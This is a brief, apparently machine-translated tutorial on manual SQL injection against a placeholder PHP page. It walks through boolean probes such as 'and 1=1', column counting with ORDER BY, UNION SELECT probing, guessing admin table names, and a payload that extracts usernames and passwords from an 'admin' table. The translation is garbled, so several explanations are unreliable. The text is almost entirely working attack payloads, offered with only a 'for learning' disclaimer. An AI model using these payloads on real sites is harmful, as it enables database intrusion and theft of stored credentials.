/ * Examples determines rule http://xxx.xxx/new.php?id=57 and 1 = 1 correctly Error http://xxx.xxx/new.php?id=57 and 1 = 2 http://xxx.xxx/new.php?id=57 and 2-1 = 1 correctly Error http://xxx.xxx/new.php?id=57 and 2-1 = 2 http://xxx.xxx/new.php?id=57 and a = a correct http://xxx.xxx/new.php?id=57 and 'a' = 'a' errors * / Of course, different sites may have different judge rules
In order to determine what code above statements prove database can perform logic is correct in
Order by the number of columns or column names / * the ORDER BY statement to sort the result set according to the specified queue * /
Of the order by 1 normal order by 2 order by 3 normal is not normal on behalf of the two fields is two
of Union the SELECT 1 , 2 form the User Name field in the Order by / * of Union check the SELECT field form translated into Chinese it is from the mean from certain databases */
admin username table table table sys_admin are commonly used user table
So we continue to look at the top of the search field
union select username,password from admin order by 字段名
The system is also commonly used table requires its own judgment to guess
This article is only white Learning Exchange chiefs do not spray